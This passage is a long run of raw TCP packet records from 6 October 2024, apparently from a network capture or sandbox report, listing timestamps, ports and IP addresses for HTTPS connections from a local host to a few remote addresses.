                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.848500967 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.848541021 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.848563910 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.848614931 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.848614931 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.848902941 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.848974943 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.848993063 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849066019 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849345922 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849387884 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849432945 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849452972 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849459887 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849504948 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849791050 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849858046 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849859953 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849889040 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849925041 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.849946976 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853398085 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853440046 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853521109 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853538036 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853565931 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853584051 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853781939 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853827000 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853852034 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853863955 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853890896 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.853929043 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854319096 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854389906 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854391098 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854417086 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854451895 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854473114 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854784966 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854825020 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854863882 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854876995 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854921103 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.854921103 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.866286039 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.943674088 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.943722010 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.943768978 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.943789005 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.943821907 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.943840981 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.944658041 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.944698095 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.944730997 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.944742918 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.944791079 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.944791079 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945108891 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945147991 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945180893 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945194006 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945219994 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945240021 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945326090 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945369959 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945393085 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945405006 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945431948 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945450068 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.945465088 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946070910 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946110010 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946168900 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946182966 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946207047 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946432114 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946479082 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946494102 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946508884 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946537971 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946794987 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946845055 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946860075 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946876049 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.946907043 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.947118044 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.947165012 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.947180033 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.947194099 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.947231054 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.992259026 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:49.992274046 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.029666901 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.029743910 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.029798985 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.029814959 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.029849052 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.030977011 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031007051 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031049967 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031063080 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031074047 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031141043 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031157017 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031192064 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031207085 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031234980 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031538010 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031558037 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031599045 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031619072 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.031641960 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.032974005 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.032988071 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033056974 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033066034 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033075094 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033086061 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033107996 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033139944 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033152103 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033390999 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033405066 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033473015 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033487082 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033546925 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033565044 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033597946 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033612013 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.033637047 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.051716089 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.086637020 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.102106094 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.116069078 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.116086960 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.116173029 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.116188049 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.116240978 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.117862940 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.117877007 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.117938042 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.117950916 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.117999077 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118432999 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118447065 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118503094 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118518114 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118571997 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118861914 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118876934 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118917942 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118930101 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118974924 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.118974924 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.119359970 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.119374990 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.119427919 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.119441032 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.119494915 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.119992971 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120007992 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120104074 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120117903 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120172024 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120493889 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120508909 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120573044 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120587111 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120613098 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120635986 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120803118 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120817900 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120862961 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120876074 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120899916 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.120918989 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.139853954 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.139882088 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.139894962 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.141030073 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.141098976 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.159614086 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.159804106 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.159816027 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.159851074 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.182317972 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.182346106 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.182404995 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.182703018 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.182714939 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.204030991 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.204051018 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.206794977 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.206814051 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.206902027 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.206918955 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.206974030 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207262039 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207276106 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207338095 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207350969 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207427979 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207799911 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207820892 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207880020 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207894087 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.207946062 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208225012 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208240032 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208301067 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208313942 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208362103 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208678961 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208694935 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208765030 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208776951 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.208836079 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209078074 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209094048 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209151983 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209165096 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209213972 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209480047 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209496021 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209556103 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209569931 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209623098 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209882975 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209897995 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209954023 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209969044 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.209994078 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.210014105 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.248411894 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.259679079 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.260359049 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.260427952 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.260431051 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.260461092 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.260514021 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.260545969 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.261162043 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.261233091 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.261244059 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.261265993 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.261322975 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.261600018 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.265250921 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.265330076 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.265341043 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.265362024 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.265413046 CEST49723443192.168.2.6151.101.2.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.276966095 CEST44349723151.101.2.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.293443918 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.293461084 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.293550014 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.293565989 CEST44349719172.67.196.219192.168.2.6
